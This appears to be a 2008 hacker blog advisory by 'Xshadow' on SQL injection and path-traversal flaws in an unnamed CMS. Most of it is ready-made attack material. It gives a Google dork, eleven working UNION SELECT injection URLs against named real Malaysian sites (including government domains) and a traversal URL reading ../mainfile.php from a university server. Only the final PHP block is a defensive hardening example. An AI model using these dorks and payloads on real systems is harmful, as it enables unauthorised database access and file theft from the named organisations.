Archive for December 2008

SQL Injection @ Malingsial CMS paranoid dork

SQL Injection Vulnerability & Multiple SQL Injection Vulnerabilities in Malingsial CMS with Paranoid Dork

[+] Bug : SQL injection
[+] Vendor : Random Paranoid
[+] Author : Xshadow
[+] Contact : admin[a]cukdus[dot]org
[+] Visit : http://xshadow-power[dot]com
[+] Greetz : inc0mp13te, IndoUnderground, Jack-, selalu_ngantuk, cyber_tomat, black_sonic, k0il, all member x-code
[+] Main Support: Indonesia
[+] Support Person: yadoy666 (http://yadoy666.serverisdown.org/)
[+] Sponsors: http://malingsial.serverisdown.org/

Paranoid Dork: inurl:”.php?id=” site:.my

[o]Sql Injection part 1
[=]original vendor: unknown malingsial CMS
[=]vuln file : corporate.php
[=]target : http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+UNION+SELECT+0,version(),2,3,4,5,6,7,8

[o]Sql Injection part 2
[=]original vendor: Multimedia Development Corporation
[=]vuln file : event_detail.php
[=]target :http://cmc.msc.com.my/event_detail.php?ID=239+AND+1=2+UNION+SELECT+0,1,version(),version(),
version(),5,6,7,8,9,10,11,12,13,14–

[o]Sql Injection part 3
[=]original vendor: unknown malingsial CMS
[=]vuln file : readnews.php
[=]target :http://www.mynic.net.my/readnews.php?id=78+AND+1=2+UNION+SELECT+0,version(),2,3,version(),5,6,7,8,
9,10,11,12–

[o]Sql Injection part 4
[=]original vendor: unknown malingsial CMS
[=]vuln file : tips.php
[=]target : http://www.fomca.org.my/english/tips.php?id=21+AND+1=2+UNION+SELECT+0,version(),version(),3,4,5,6,7,8–

[o]Sql Injection part 5
[=]original vendor: unknown malingsial CMS
[=]vuln file : full_metadata_xml.php
[=]target: http://www.infodesa.gov.my/infodesa/applications/datasource/full_metadata_xml.php?id=191+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,version(),
10,version(),version(),version(),version(),version(),version(),version(),18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,
50,51–

[o]Sql Injection part 6
[=]original vendor: unknown malingsial CMS
[=]vuln file : about_pressRelease_det.php
[=] target : http://www.nazakia.com.my/about_pressRelease_det.php?id=43+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,
version(),version(),13,14,15,16,17,18,19–

[o]Sql Injection part 7
[=]original vendor: unknown malingsial CMS
[=]vuln file : aduan_siar_c.php
[=] target : http://www.halaljakim.gov.my/aduan_siar_c.php?id=1931+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,version(),9,
10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28–

[o]Sql Injection part 8
[=]original vendor: unknown malingsial CMS
[=]vuln file : faq.php
[=] target : http://www.mynic.net.my/faq.php?id=29+AND+1=2+UNION+SELECT+0,version(),2,3–

[o]Sql Injection part 9
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.reliancemetal.com.my/catalog/item.php?id=124+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,9,
10,11,12,13,14–

[o]Sql Injection part 10
[=]original vendor: unknown malingsial CMS
[=]vuln file : pressroom_pressrelease_release.php
[=] target : http://www.misc.com.my/pressroom_pressrelease_release.php?id=35+AND+1=2+UNION+SELECT+0,1,
version(),version(),version(),5,6,7,version(),9,10–

[o]Sql Injection part 11
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.automotivefilter.com.my/catalog/item.php?id=1610+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,
9,10,11,12,13,14–


Remote File Disclosure Vulnerability @ Malingsial CMS

===========================================
Bug : Remote File Disclosure Vulnerability
Vendor : unknown
Author : Xshadow
Contact : admin[a]cukdus[dot]org
Visit : http://xshadow-power[dot]com
===========================================
[o]Vulnerable file
download.php
// The filename is taken straight from the query string and never validated,
$filename=$_GET["filename"];
// so "../" sequences in it escape the dokumen/ directory.
$fullpath="dokumen/".$filename;
session_cache_limiter("public, post-check=50");
header("Cache-Control: private");
header("Content-Type: application/zip");
header("Content-Length: ".filesize($fullpath));
header("Content-Disposition: attachment; filename=$filename");
readfile($fullpath);

dork: download.php?filename= site:my

Sample: http://chemical.eng.um.edu.my/download.php?filename=../mainfile.php
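
Hardened form of the download.php above, as an added example that is not part of the original advisory or the vendor's code. It assumes only .zip files are meant to be served (the original sends Content-Type: application/zip) and that dokumen/ sits beside the script; resolve_download() is a hypothetical helper name.

```php
<?php
// Added example: hardened variant of the download.php shown in the advisory.
// Assumptions (not from the original): only .zip files are served and the
// dokumen/ directory sits beside this script.

/**
 * Resolve a user-supplied name to a file inside $baseDir, or return null.
 * resolve_download() is a hypothetical helper name.
 */
function resolve_download(string $baseDir, string $name): ?string
{
    // Drop any directory component, so "../mainfile.php" becomes "mainfile.php".
    $name = basename(str_replace('\\', '/', $name));

    // Allow-list the name shape: rejects mainfile.php, NUL bytes and dotfiles.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\.zip\z/', $name)) {
        return null;
    }

    // Canonicalise both paths and require the result to stay under the base;
    // this also catches symlinks that point outside dokumen/.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$raw  = $_GET['filename'] ?? '';
$path = resolve_download(__DIR__ . '/dokumen', is_string($raw) ? $raw : '');
if ($path === null) {
    // Same response for "missing" and "rejected", so nothing is disclosed.
    http_response_code(404);
    exit;
}

// Emit only safe characters so the name cannot inject header syntax.
$safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Cache-Control: private');
header('Content-Type: application/zip');
header('Content-Length: ' . filesize($path));
header('Content-Disposition: attachment; filename="' . $safeName . '"');
readfile($path);
```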
